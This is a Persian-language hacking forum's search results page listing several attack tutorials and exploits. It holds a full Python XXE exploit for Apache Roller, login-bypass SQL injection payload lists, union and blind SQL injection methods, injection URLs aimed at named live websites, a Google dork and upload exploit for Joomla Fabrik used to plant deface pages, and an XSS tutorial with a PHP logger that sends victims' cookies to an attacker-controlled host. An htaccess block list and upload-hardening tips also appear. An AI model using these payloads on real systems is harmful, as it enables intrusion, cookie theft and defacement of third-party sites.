discord icon
سرور دیسکورد گاردایران

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'bug'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


گروه محصول

  • بسته های آموزشی
  • ارتقا به کاربر ویژه

تالارهای گفتگو

  • انجمن گاردایران
    • قوانین و اطلاعیه های سایت
    • اخبار هک و امنیت
    • انتقادات و پیشنهادات
    • بخش خصوصی
    • بخش ویژه - VIP
    • بخش زیر زمینی
  • سوال و جواب های عمومی
    • سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
    • سوال و جواب های امنیت سیستم های شخصی
    • سوال و جواب های برنامه نویسی
    • سوال و جواب های ابزارهای امنیتی
    • سوال و جواب های شبکه
    • سوال و جواب های مدیریت محتوا و وبلاگ ها
    • سوال و جواب های بخش Trojan , Rat , Keylogger
    • سوال و جواب های سیستم عامل ها
    • سوال و جواب های امنیت ایمیل های شخصی
    • سوال و جواب الکترونیک
    • سوال و جواب های موبایل
    • سوال و جواب های متفرقه
  • انجمن نفوذ و امنیت
    • آموزش های تصویری
    • آموزش های تصویری نفوذ به سیستم های شخصی و روشهای مقابله
    • آموزش های تصویری سایت ها و سرورها و روشهای مقابله
    • آموزشهای تصویری شبکه و روشهای مقابله
    • حملات شبکه و راههای مقابله
    • DOS , DDOS
    • ویروس ها و تروجان ها
    • متاسپلویت Metasploit
    • ابزارهای امنیتی
    • Shell Script
    • آسیب پذیری های وایرلس
    • اکسپلویت
    • باگ های امنیتی
    • امنیت ایمیلهای شخصی
    • تارگت های تمرینی
    • اسکنرها و ابزارهای هکینگ
  • بخش کرک و رمزنگاری
    • ابزار کرک
    • مقالات و آموزشهای کرک
    • مقالات و آموزشهای رمزنگاری
    • ابزارهای رمزنگاری
    • پروکسی لیست
    • پسورد لیست و کمبو لیست
    • کانفیگ
    • اکانت های کرک شده
  • برنامه نویسی
    • برنامه نویسی
    • برنامه نویسی تحت وب
  • بخش موبایل
    • بخش مخصوص موبایل
    • هک موبایل
  • شبکه
  • سیستم عامل
  • الکترونيک و روباتيک
  • گرافيک
  • متفرقه

جستجو در ...

نمایش نتایجی که شامل ...


تاریخ ایجاد

  • شروع

    پایان


آخرین بروزرسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


Website URL


Yahoo


Skype


محل سکونت

26 نتیجه پیدا شد

  1. با سلام خدمت دوستان عزیز گاردایران . در اینجا کدی رو قرار میدم که میتونید از اون برای جلوگیری از اسیب پذیری Sql Injection استفاده کنید اما این رو در نظر داشته باشید که فقط ایمن سازی با htaccess جالب نیست و بهتره در کنارش اسیب پذیری رو از طریق توابع و یا استفاده از PDO و .. رفع کنیم ، ایمن سازی با htaccess فقط برای محکم کاری هست . <IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=http:// [OR] RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=http%3A%2F%2F [OR] RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=(\.\.//?)+ [OR] RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=/([a-z0-9_.]//?)+ [NC,OR] RewriteCond %{QUERY_STRING} \=PHP[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12} [NC,OR] RewriteCond %{QUERY_STRING} (\.\./|\.\.) [OR] RewriteCond %{QUERY_STRING} ftp\: [NC,OR] RewriteCond %{QUERY_STRING} http\: [NC,OR] RewriteCond %{QUERY_STRING} https\: [NC,OR] RewriteCond %{QUERY_STRING} \=\|w\| [NC,OR] RewriteCond %{QUERY_STRING} ^(.*)/self/(.*)$ [NC,OR] RewriteCond %{QUERY_STRING} ^(.*)cPath=http://(.*)$ [NC,OR] RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR] RewriteCond %{QUERY_STRING} (<|%3C)([^s]*s)+cript.*(>|%3E) [NC,OR] RewriteCond %{QUERY_STRING} (\<|%3C).*iframe.*(\>|%3E) [NC,OR] RewriteCond %{QUERY_STRING} (<|%3C)([^i]*i)+frame.*(>|%3E) [NC,OR] RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [NC,OR] RewriteCond %{QUERY_STRING} base64_(en|de)code[^(]*\([^)]*\) [NC,OR] RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR] RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) [OR] RewriteCond %{QUERY_STRING} ^.*(\[|\]|\(|\)|<|>).* [NC,OR] RewriteCond %{QUERY_STRING} (NULL|OUTFILE|LOAD_FILE) [OR] RewriteCond %{QUERY_STRING} (\./|\../|\.../)+(motd|etc|bin) [NC,OR] RewriteCond %{QUERY_STRING} (localhost|loopback|127\.0\.0\.1) [NC,OR] RewriteCond %{QUERY_STRING} (<|>|'|%0A|%0D|%27|%3C|%3E|%00) [NC,OR] RewriteCond %{QUERY_STRING} concat[^\(]*\( [NC,OR] RewriteCond %{QUERY_STRING} union([^s]*s)+elect [NC,OR] RewriteCond %{QUERY_STRING} union([^a]*a)+ll([^s]*s)+elect [NC,OR] RewriteCond %{QUERY_STRING} (;|<|>|'|"|\)|%0A|%0D|%22|%27|%3C|%3E|%00).*(/\*|union|select|insert|drop|delete|update|cast|create|char|information_schema|table_name|convert|alter|declare|order|script|set|md5|benchmark|encode|extractvalue|rand()|concat|group_concat|from|From|,|.|+|order|by) [NC,OR] </IfModule> موفق و پیروز باشید .
  2. با سلام خدمت دوستان عزیز با اموزش اسیب پذیری XXE یا XML External Entity در خدمت شما هستیم . توضیجات اولیه :‌ با استفاده از این اسیب پذیری شما قادر به دسترسی به فایل های سمت سرور و سیستمی دارید این اسیب پذیری سمت سرور است و زمانی رخ میده که ارسال ورودی xml انجام شده باشه و بر ورودی ها نظارت نباشه و خوب کانفیگ نکرده باشن ، از مزایای دیگر اسیب پذیری میتوان به استخراج اطلاعات حساس اسکن پورت های باز و جعل درخواست سمت سرور رو انجام داد ، ضعفی که باعث می شود این آسیب پذیری به وجود آید سمت سرور است که با دستورات XML Parser انجام میشود و اگردرخوست های ورودی توسط کلاینت به سرور رو خوب کنترل نکرده باشند باعث میشه که نفوذگر با استفاده از دستورات XML Parser اقدام به حمله کند . آشنایی با XML Parser : XML Parser یک آبجکتی است که اکثر مرورگر ها اونو ساپورت می کنند می توانید داکیومنت ها و اطلاعات را نیز استخراج کند و همچنین اقدام به خواندن تگ های XML کنید . XPath Injection : اسیب پذیری XXE Injection خیلی شباهت داره به اسیب پذیری Xpath Injection که قبلا اموزشش رو در انجمن قرار دادم :‌ انواع حملات XXE : : Exploiting XXE to retrieve file در این حمله استخراج اطلاعات صورت میگیرد : Exploiting XXE to Perform SSRF attack در این حمله امکان ترکیب اسیب پذیری SSRF هم وجود دارد . :‌ Exploiting Blind XXE exfiltrate data out-of-band این حمله زمانی صورت می گیره که داده های حساس در حال انتقال از میان سرور و کاربر هستند و جایی که داده ها از سرور برنامه به سیستمی منتقل می شوند و هکر می تواند آن ها رو کنترل کند . توی این جلسه قراره به حمله Exploiting XXE to retrieve file بپردازیم : برای مثال شما یک فرم رو سابمیت میکنید یا هر چیز دیگه بعد با استفاده از ابزار Burp Suite درخواست ها رو برسی میکنید و برای مثال این کد رو مشاهده میکنید :‌ <?xml version=”1.0” encoding=”UTF-8”?> و در این تگ برخی از این پارامتر ها اومده :‌ <stockCheck><productld>2</productld><storeld>1</storeld></stockCheck> حالا اگر بین این دو تگ این دستور xml رو قرار دهید و پارامتر ۲ را تغییر دهید فایل passwd رو فراخوانی میکنه : <!DOCTYPE test[<!ENTITY xxe SYSTEM “file:///etc/passwd”>]> کد اولیه (بدون هیچ تغییر ) :‌ <?xml version=”1.0” encoding=”UTF-8”?><stockCheck><productld>2</productld><storeld>1</storeld></stockCheck> و تبدیلش میکنیم به این :‌ <?xml version=”1.0” encoding=”UTF-8”?> <!DOCTYPE test[<!ENTITY xxe SYSTEM “file:///etc/passwd”>]> <stockCheck><productld>&xxe;</productld><storeld>1</storeld></stockCheck> و توی پاسخ میبینید که فایل passwd رو فراخوانی کرده ، در ضمن باید توی burp از قسمت repeater اقدام کنید . ویدئو : تئوری . پروژه محور یک . پروژه محور دو . اکسپلویت :‌ # Exploit Title: Apache Roller 5.0.3 - XML External Entity Injection (File Disclosure) # Google Dork: intext:"apache roller weblogger version {vulnerable_version_number}" # Date: 2018-09-05 # Exploit Author: Marko Jokic # Contact: http://twitter.com/_MarkoJokic # Vendor Homepage: http://roller.apache.org/ # Software Link: http://archive.apache.org/dist/roller/ # Version: < 5.0.3 # Tested on: Linux Ubuntu 14.04.1 # CVE : CVE-2014-0030 # This exploit lets you read almost any file on a vulnerable server via XXE vulnerability. # There are two types of payload this exploit is able to use, 'SIMPLE' & 'ADVANCED'. # 'SIMPLE' payload will work in most cases and will be used by default, if # server errors out, use 'ADVANCED' payload. # 'ADVANCED' payload will start local web server and serve malicious XML which # will be parsed by a target server. # To successfully perform attack with 'ADVANCED' payload, make sure that port # you listen on (--lport flag) is accessible out of the network. #!/usr/bin/env python import SimpleHTTPServer import SocketServer import argparse import sys import threading from xml.etree import ElementTree import urllib3 import requests SIMPLE_PAYLOAD = """<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY> <!ENTITY xxe SYSTEM "file://{}">]> <methodCall> <methodName>&xxe;</methodName> </methodCall> """ ADVANCED_PAYLOAD = """<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ENTITY % start "<![CDATA["> <!ENTITY % xxe SYSTEM "file://{}"> <!ENTITY % end "]]>"> <!ENTITY % dtd SYSTEM "{}"> %dtd; ]> <methodCall> <methodName>&all;</methodName> </methodCall> """ urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) class MyHandler(SimpleHTTPServer.SimpleHTTPRequestHandler): def do_GET(self): self.send_response(200) self.send_header('Content-Type', 'text/html') self.end_headers() self.wfile.write('<!ENTITY all "%start;%xxe;%end;">') def check_exploit(host): response = requests.post(host + "/roller-services/xmlrpc", verify=False) if response.status_code == 200: return True return False def exploit(host, payload): response = requests.post(host + "/roller-services/xmlrpc", data=payload, verify=False) xml_tree = ElementTree.fromstring(response.text) parsed_response = xml_tree.findall("fault/value/struct/member")[1][1].text print parsed_response def start_web_server(port): handler = MyHandler httpd = SocketServer.TCPServer(('', port), handler, False) httpd.allow_reuse_address = True httpd.server_bind() httpd.server_activate() httpd.handle_request() httpd.shutdown() def main(): parser = argparse.ArgumentParser() parser.add_argument('-u', metavar="URL", dest="url", required=True, help="Target URL") parser.add_argument('-f', metavar='FILE', dest="file", required=False, default="/etc/passwd", help="File to read from server") parser.add_argument('--lhost', required='--rport' in sys.argv, help="Your IP address for http web server") parser.add_argument('--lport', type=int, required='--rhost' in sys.argv, help="Port for web server to listen on") args = parser.parse_args() host = args.url full_file_path = args.file advanced = False lhost = args.lhost lport = args.lport if lport is not None and lport is not None: advanced = True check = check_exploit(host) if check: if advanced: th = threading.Thread(target=start_web_server, args=(lport,)) th.daemon = True th.start() payload = ADVANCED_PAYLOAD.format(full_file_path, "http://{}:{}".format(lhost, lport)) else: payload = SIMPLE_PAYLOAD.format(full_file_path) exploit(host, payload) else: print "[-] TARGET IS NOT VULNERABLE!" main() مقاله : یک سری مقاله که میتونه خیلی مفید باشه . Owasp : https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing Owasp : https://owasp.org/www-chapter-pune/XXE_Exploitation.pdf Doddsecurity : https://doddsecurity.com/312/xml-external-entity-injection-xxe-in-opencats-applicant-tracking-system Medium : https://medium.com/@ghostlulzhacks/xml-external-entity-xxe-62bcd1555b7b Exploit DB : https://www.exploit-db.com/docs/48583 ====================================================================== لایک فراموش نشه ، موفق و پیروز باشید .
  3. MR.MSA

    Admin Page ByPass

    با سلام خدمت دوستان گاردایران دوستانی رو توی بخش دیفیس دیدم که میگن برای admin page bypass به غیر از '=''or' چه چیز های دیگه ای میتونیم برای بایپس کردن استفاده کنیم . در این پست براتون کد ها رو میزارم . or 1=1 or 1=1-- or 1=1# or 1=1/* admin' -- admin' # admin'/* admin' or '1'='1 admin' or '1'='1'-- admin' or '1'='1'# admin' or '1'='1'/* admin'or 1=1 or ''=' admin' or 1=1 admin' or 1=1-- admin' or 1=1# admin' or 1=1/* admin') or ('1'='1 admin') or ('1'='1'-- admin') or ('1'='1'# admin') or ('1'='1'/* admin') or '1'='1 admin') or '1'='1'-- admin') or '1'='1'# admin') or '1'='1'/* admin" -- admin" # admin"/* admin" or "1"="1 admin" or "1"="1"-- admin" or "1"="1"# admin" or "1"="1"/* admin"or 1=1 or ""=" admin" or 1=1 admin" or 1=1-- admin" or 1=1# admin" or 1=1/* admin") or ("1"="1 admin") or ("1"="1"-- admin") or ("1"="1"# admin") or ("1"="1"/* admin") or "1"="1 admin") or "1"="1"-- admin") or "1"="1"# admin") or "1"="1"/* موفق و پیروز باشید .
  4. MSACMS با سلام خدمت تمام دوستان و مدیران عزیز سایت گاردایران در این تاپیک برای شما یک خدماتی رو می خواهم ارائه بدهم نام خدمات msacms هست که سه cms : 1.wordpress 2.drupal 3.joomla رو بالا اوردم تا بتوانید به صورت رایگان با cms ها کار کنید و اسیب پذیری و باگ پرایوت پیدا کنید ، همچنین اسیب پذیری توی در پوسته ها و پلاگین ها و .... این خدمات مثل یک ازمایشگاه می مونه که مثلا : شما میای روی یکی از cms های دلخواه تست اسیب پذیری انجام می دهید و روی پلاگین های ورژن دلخواه و پوسته دلخواه و ... و مثلا یه کسی که خیلی بلد نیست میاد و کار با cms رو یاد میگیره . و هر دوستی اگر خواست درخواست می دهد و یه cms به صورت دلخواه با ورژن دلخواه برای اون نصب می شود . ادرس خدمات MSACMS : MR-MSA.XYZ : username & password یوزرنیم و پسورد cms ها : guardiran اما زمانی که شما یک cms رو انتخاب می کنید یه یوزر و پسورد می خواد که خیلی قوی هست و فقط یک بار باید بزنید .(برای امنیت بالا این کار انجام شده که هر فردی نتواند استفاده کند ) در ورژن ۱ برای دریافت یوزرنیم و پسورد به صورت خصوصی در سرور discord گاردایران و یا در قسمت پیام رسانی گاردایران باید به من پیام می دادید ، اما در ورژن ۱.۲.۰ برای شما یوزر و پسورد رو در فایل ضمیمه قرار دادم . (در تایپک دوم موجود است ) ------------------------------------------------------------------------------------------------------------------------------------------------------------- نکات مهم زمان استفاده از سایت : ۱- پسورد و یوزر cms ها همیشه guardiran هست و نباید تعویض گردد . ۲- هر روز cms ها چک می شود . ۳- هر ۳ روز یک بار در صورت لزوم cms ها ریست می شوند . ۴- فقط تا ۳ فایل و حداکثر ۱۰ مگابایت می تونید اپلود کنید . ۵- برای دریافت رمز عبور حتما باید در انجمن گاردایران ثبت نام کنید . ۶- اگر یک زمان خواستید برای مثال ببینید که می توان در این اپلودر شل اپلود کرد یا نه به جای شل از یک فایل php استفاده کنید . ۷- هیچ زمان شل اپلود نکنید ، چون اکانت شما به صورت خودکار بن می شود و دیگر قابل برگشت نیست (به دلیل شناسایی فایروال ) ۸- هیچ زمان به سایت حملات ddos نزنید چون موفق نمی شوید . ۹ - این cms به صورت مداوم بروز می شود . ------------------------------------------------------------------------------------------------------------------------------------------------------------- امنیت سرور : DDOS در حملات دیداس به شبکه خود دیتاسنتر وارد عمل می شود و آنتی دیداس را فعال می کند در حملات دیداس به سایت ها بخاطر مانیتورینگ لحظه ای که سرور دارد سریعا دسترسی به ایران محدود می شود تا حملات خنثی شود . Firewall در ورژن ۱ سرور دارای فایروال نرم افزاری CSV بود اما در ورژن ۱.۲۰ فایروال cloudflare رو هم اضافه کردیم . Shell سرور دارای انتی شل است و به علاوه فایروال مانع اجرا و استفاده از شل می شود . Backup سایت روزانه بک اپ گیری می شود . ------------------------------------------------------------------------------------------------------------------------------------------------------------- امنیت سایت : سعی کردم روی امنیت سایت کار کنم و سایتی با خدمات خوب و البته امنیت بالا ارائه بدهم و در آینده امنیت بالا تر رفته و سایت بهبود می بخشد. ------------------------------------------------------------------------------------------------------------------------------------------------------------- گزارش باگ : اگر دوستی با باگی در خود سایت مواجه شد و یا دوست داشت مورد امنیتی رو در رابطه با خود سایت گزارش بدهد به صورت خصوصی به من گزارش بده تا رفع بشود . ------------------------------------------------------------------------------------------------------------------------------------------------------------- CMS مورد نظر : اگر دوستی cms خواست تا براش نصب کنم به من پیام خصوصی بدهد . اطلاعات شامل : نوع cms ورژن مورد نظر لینک دانلود ------------------------------------------------------------------------------------------------------------------------------------------------------------- قوانین تاپیک : هر سوال داشتید در بخش سوال و جواب ها ، در غیر این صورت پاسخ داده نمی شود . انتقادات و پیشنهادات خودتون رو به صورت خصوصی به من ارسال کنید . مشکلات و خطا ها رو به صورت خصوصی ارسال کنید . ------------- ------------- ------------- تایید شده توسط مدیران بخش ‌: R3DN4X314 و proxy ------------- ------------- ------------ ورژن 1.0.0 رونمایی می کند : mr-msa.xyz ورژن 1.2.0 رونمایی می کند : mr-msa.xyz ورژن 1.3.0 رونمایی می کند : mr-msa.xyz این خدمات به صورت کامل متعلق به انجمن تیم امنیتی گاردایران بوده و هر گونه کپی برداری ، اسیب رساندن به خدمات و ... تخلف محسوب می شود و پیگرد قانونی دارد .
  5. MR.MSA

    Sql injection Exploit

    با سلام خدمت دوستان . در این تاپیک اکسپلویت های sql injection رو میزارم برای دوستانی که به اسیب پذیری sql injection علاقمند هستند . Exploit 1 : Web Mingo I.T. Solutions - SQL Injection vulnerability ********************************************************* #Exploit Title: Web Mingo I.T. Solutions - SQL Injection vulnerability #Date: 2020-11-10 #Google Dork: "Design & Developed By Web Mingo I.T. Solutions" #Category:webapps #Tested On: windows 10, Firefox Proof of Concept: Search google Dork: "Design & Developed By Web Mingo I.T. Solutions" Demo : https://signoelevators.com/product-range.php?id=-561%27%20union%20select%201,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17--+ https://www.raceias.com/news-details.php?id=-6%27%20union%20select%201,version(),3,4,5,6,7,8,9--+ https://taekwondofederationofindia.com/news-detail.php?id=-1%27%20union%20select%201,2,3,4,version(),6,7--+
  6. MR.MSA

    آموزش باگ xss

    با سلام خدمت شما دوستان عزیز یکی از دوستان آموزش باگ xss رو درخواست داشت که قرار دادم . Cross Site Scripting روش کار :‌ با دستورات javascript شما رو به یه لینک ریدایرکت می کنه و کوکی های کاربران رو به شما میده . خب حالا بریم سراغ کارمون .(فقط روی سایت هایی که باگ xss دارند میشه ) مرحله ۱ :‌ برای مثال یه چت روم هست که پیام میدید شما توش به جای پیام این متن رو ارسال میکنید :‌ <script>alert('Error')</script> اگر زمان واردشدن در صفحه در قالب خطا به شما error رو نمایش داد (به صورت هشدار مثلا) یعنی سایت باگ رو داره . مرحله ۲ : در یک سایت که مال خودتون هست یک فایل به نام xss.php درست کنید و این کد php رو درش قرار دهید : <?php $cookie=$_GET['c']; $fo=fopen('cookie.html','a'); fwrite($fo,'Cookie:'.$cookie.'<br><br><br>---------------------------------------<br><br><br>'); fclose($fo); ?> مرحله ۳ : در قسمت ارسال پیام یک پیام دیگر ارسال کنید دارای این کد javascript : <script>document.location="http://site.com/xss.php?c=" + document.cookie </script> به جای site.com ادرس سایت خودتون رو بدید که فایل xss.php رو درش گذاشتید . مرحله ۴ : وارد این ادرس شوید : http://site.com/cookie.html و زمانی که کاربران اون پیام شما رو می بینند ریدایرکت میشن به این ادرس site.com/xss.php و کوکی های اونا توی فایلی به اسم cookie.html برای شما زخیره می شود . نکات مهم زمان انجام این عمل : ۱- هیچ وقت روی سایت خودتون فایل ها رو نسازید چون اگر یه نفر متوجه بشه از سایتتون شکایت میکنه و.... ۲- روی سایت های ایرانی هیچ وقت انجام ندید . ۳- این باگ در جاهای مختلف سایت می تونه باشه مثل باکس جست و جو و بخش نظرات و... ۴- روش های خیلی زیادی برای استفاده از این باگ وجود دارد . اختصاصی Mr.MSA لایک فراموش نشه ! موق و پیروز باشید .
  7. با سلام خدمت دوستان عزیز گارد ایران در این تاپیک برای شما تارگت های مختلف sql injection رو قرار می دم که به صورت ویدئویی هست و ضبط کردم تا بتوانید تمرین کنید لذت ببرید . 😁 لینک کانال برای مشاهده ویدئو ها : https://www.youtube.com/channel/UCLkbfmELZBnOvh1dwK1hXZw چند نکته مهم :‌ لطفا اگر دوستی قصد ارسال پست دارد فقط به صورت ویدئویی باشد . تارگت در مورد sql injection باشد و بهتره تارگت با نکته ارائه شود . اسپم ارسال نکنید و اگر سوالی داشتید در بخش سوال و جواب ها بپرسید . و اگر پیشنهاد و یا چیزه دیگه ای بود به صورت خصوصی پیام دهید . (در این جا اسپم ارسال نشود ) تشکر 🙏 .
  8. MR.MSA

    جلوگیری از باگ RFU

    با سلام خدمت کاربران و مدیران عزیز گارد ایران در این پست قصد دارم به شما نحوه پچ باگ RFU بدم . RFU : Remote File Upload یک توضیح مختصر : هنگام اپلود یک فایل در سرور این اسیب پذیری به وجود می اید که هکر فایل مخرب خودش رو در سرور آپلود می کند (shell) به صورت کلی این اسیب پذیری بسیار خطر ناک است و باعث می شود که هکر دسترسی کامل به سایت بگیرد ولی حالت های دیگری هم وجود دارد که خطر این باگ کمتر می شود مثلا هکر نمی تواند فایل php خودش که شل است رو آپلود کنه به جای آن فایل html خودش که دیفیس پیج است رو آپلود می کنه یه کمی توضیح طولانی شد خب حالا میریم سراغ جلو گیری از باگ RFU در کد نویسی اولین قدم باید فایل ها در یک جای مشخص و خاص باشد می توانید از این دستور استفاده کنید : move_uploaded_file($_FILES['upload']['tmp_name'],"Guardiran/{$_FILES['upload']['name']}"); الان فایل های اپلودی در فولدری به نام Guardiran قرار می گیرند . حالا برای اینکه فایل های php قابل آپلود نباشند : if(end(explode('.',$_FILES['upload']['name'])) !== 'php'){ move_uploaded_file($_FILES['upload']['tmp_name'],"Guardiran/{$_FILES['upload']['name']}"); }else{ } تا الان آپلودر ما کمی وضعیتش بهتر شده بعضی از سایت ها از این فیلترینگ استفاده می کنند ولی امنیت بسیار پایینی دارد چون زبان php به حروف بزرگ و کوچک حساس است یعنی ما گفتیم با در آخر نام ... php نباشد اما برای مثال هکر با این نام اپلود می کند b374k.PHP که هر دو فرمت php هستند اما از نظر حروف کوچک و بزرگ باهم فرق دارند پس کد های خودمون رو تغییر می دهیم . به این صورت : if(end(explode('.',$_FILES['upload']['name'])) == 'jpg'){ move_uploaded_file($_FILES['upload']['tmp_name'],"Guardiran/{$_FILES['upload']['name']}"); }else{ } الان یک اپلودر با امنیت خوب داریم ولی هنوز با بایپس ها و متد و... امکان دور زدن وجود دارد پس امنیت رو بالا تر می بریم تا کار هکر سخت تر شود . کاری می کنیم که هکر به راحتی فایل خودش رو پیدا نکنه و از تابع rand استفاده می کنیم و کد ها رو به این صورت می نویسیم :‌ if(end(explode('.',$_FILES['upload']['name'])) == 'jpg'){ $ch = rand(); move_uploaded_file($_FILES['upload']['tmp_name'],"Guardiran/{$ch}.jpg"); }else{ } می توانید بعد از else (در غیر این صورت ) خطای خود را با html و css طراحی کنید . چند راه پیشنهادی جهت رفع بهتر باگ RFU : بهتر است که از یک سرور اختصاصی استفاده کنید و فایل های اپلودی خودتون رو در یک سرور دیگر آپلود کنید . دایرکتوری فایل های اپلود با دایرکتری فایل های اصلی متفاوت باشد . امیدوارم از این پست لذت برده باشید . Download Uploader.zip
  9. با سلام خدمت دوستان عزیز در این تاپیک قصد دارم به شما متد Xpath رو آموزش بدهم . Xpath injection کاربرد : 1. مثلا زمانی که در دستور +order+by+99999-- عدد 1 هم که می زنید صفحه لود نمی شود باید از این متد استفاده کنید . 2. زمانی که به ارورnumber of column the diffrent باید از این متد استفاده کنید . 3. زمانی که union…. را می زنید و با وجود اینکه تعداد درست است ولی به شما ستون اسیب پذیر را نشان ندهد . 4. و..... -------------- -------------- -------------- روش استفاده از متد xpath اول از بایپس هایی که بلدید استفاده کنید مثل : منفی پشت عدد ، source ، بزرگ کردن حروف و .... اگر مشکل حل نشد به سراغ این متد میاید . آموزش متد xpath : بدست اوردن ورژن : …..?sa=12+and+extractvalue(rand(),concat(0x7e,version()))-- 0x7e به معنای علامت (~) است . version() به معنای ورژن سایت است. در آموزش بعدی به شما بیرون کشیدن تیبل ها را آموزش می دهم .
  10. با سلام خدمت شما کاربران و مدیران عزیز گارد ایران در این پست می خواهم به شما متد قدرتمند blind را در سایت های asp آموزش بدهم . Blind to asp تست اسیب پذیری : and 1=1 باید لود شود و and 1=2 نباید لود شود . نام دیتابیس با دستور : and isnull (ascii(substring (cast((select lower(db_name(0)))as varchar(8000)),1,1)),0)>97 97 که با کد ascii می شود a و داریم می گوییم حرف اول نام دیتابیس a است و اگر صفحه لود شد یعنی حرف اول a نیست و 97 مثلا می شود 98 یعنی b و به همین صورت پیش می روید یکی یکی تا اینکه به یک عدد برسید که صفحه لود نشود و ان اولین حرف نام دیتابیس هست و بیشتر کار ها هم مثل blind در mysql است و برای مثلا انجام دادن همین کار برای حرف دوم نام دیتابیس ان عدد را که در دستور بالا قرمز کردیم را مثلا کنید ۲ و برای حرف ۳ بکنید ۳ و به همین صورت . ببخشید که یک کمی طولانی شد . --------- --------- --------- --------- --------- --------- --------- --------- --------- --------- نکته : اگر یک زمان نتیجه این طور شد : (مثلا برای حرف ۲‌) 99 ‌< true 100 > true 99 = false یعنی بیشتر از ۹۹ و کمتر از ۱۰۰ و ۹۹ هم نیست پس بین این ها ۹۹.۵ است که تخمین زده می شود به ۱۰۰ به این صورت : and isnull (ascii(substring (cast((select lower(db_name(0)))as varchar(8000)),1,1)),0)>99 = load and isnull (ascii(substring (cast((select lower(db_name(0)))as varchar(8000)),1,1)),0)>100 = no load and isnull (ascii(substring (cast((select lower(db_name(0)))as varchar(8000)),1,1)),0)=99 = no load --------- --------- --------- --------- --------- --------- --------- --------- --------- --------- بیرون کشیدن نام دیتابیس های بعدی : and isnull (ascii(substring(cast((select lower (db_name(0))) as varcher (8000)),1,1)),0)>97 برای اینکار ان عدد 0 را که آبی هست یکی یکی اضافه کنید تا یکی یکی بروید به دیتابیس بعد . مثال : and isnull (ascii(substring(cast((select lower (db_name(1))) as varcher (8000)),6,1)),0)>97 and isnull (ascii(substring(cast((select lower (db_name(2))) as varcher (8000)),4,1)),0)>98 and isnull (ascii(substring(cast((select lower (db_name(3))) as varcher (8000)),3,1)),0)>102 and isnull (ascii(substring(cast((select lower (db_name(4))) as varcher (8000)),1,1)),0)>107 --------- --------- --------- --------- --------- --------- --------- --------- --------- --------- چون متد پیچیده ای هست و برای اینکه پست طولانی نشود در آموزش بعد به شما بیرون کشیدن تیبل ها را آموزش می دهم .
  11. MR.MSA

    متد Fabrik

    Fabrik موارد قابل استفاده : در سایت های جوملا قابل استفاده است . یکی از زیر مجموعه های RFI در سایت هایی که این ادرس را دارند (دورک): index.php?option=com_fabrik ....و Dork : inurl:index.php?option=com_fabrik مراحل متد :‌ ۱ ) دورک را بزنید و یک سایت را انتخاب کنید و اگر صفحه بدون خطای ۴۰۴ ، ۴۰۱ و ۵۰۰ لود شد یعنی به احتمال زیاد این باگ را دارد . (مطمئن شوید که سایت با cms جوملا هست ) ۲) این اکسپلویت را به ادرس سایت اضافه کنید . Exploit : index.php?option=com_fabrik&c=import&filetype=csv&tables=1 ۳) سپس فایل خود را آپلود کنید .( اون فایل می توانید دیفیس پیج شما باشد . ) ۴) این ادرس را به سایت اضافه و به جای (FILE_NAME) نام فایل خودتان را بنویسید . /media/(FILE_NAME)
  12. با سلام خدمت کاربران و مدیران عزیز گارد ایران توضیح مختصر در رابطه با جداول (table) تیبل های سیستمی : تیبل هایی که بیشتر مواقع با حروف بزرگ هستند و زیاد به کار ما نمیان . تیبل های user یا کاربری : تیبل هایی که ما با آنها کار داریم و بیشتر مواقع با حروف کوچک هستند . ما قبلا برای محدود سازی از این روش استفاده می کردیم : Site.com/news.php?id=39+union+select+1,2,3,4,5+from+information_schema.tables+where+table_schema=database()-- و حالا در محدود سازی که می خواهم به شما آموزش دهم url به این طریق می شود : Site.com/news.php?id=39+union+select+1,2,3,4,5+from+information_schema.tables+where+ascii(substring((table_name),1,1))>97-- و دارید می گویید که تمام تیبل هایی را که حرف های شان از عدد 97 (a) بیشتر است نمایش بده که اعداد بیشتر از 97 در کدگذاری ascii حروف کوچک هستند. برای اینکه بگویید تیبل هایی که حرف دوم آن ها کوچک است را برسی کند : Site.com/news.php?id=39+union+select+1,2,3,4,5+from+information_schema.tables+where+ascii(substring((table_name),2,1))>97-- نکته : در این روش از کدگذاری ascii استفاده شده که عدد 97 به معنای a کوچک است . امیدوارم لذت برده باشید تشکر فراموش نشه 😅
  13. MR.MSA

    متد Having

    بایپس نشان ندادن ستون آسیب پذیر اگر بایپس هایی مثل null کردن را انجام دادید و نتیجه نداد باید از Having استفاده کنید . نوع having ها : Having null Having false Having 0 Having 1 like 0 Having 1 limit 0 به این صورت : ......?id=1+<having>+union+select+1,2,3,4,5,6,7,8,9 در جایی که نوشته شده <having> باید نوع having را بنویسید . مثال : .....?id=2 having null+union+select+1,2,3,4,5,6,7,8,9-- تمام having ها را انجام دهید تا به نتیجه برسید . امیدوارم لذت برده باشید . 💙 فراموش نشه 😍
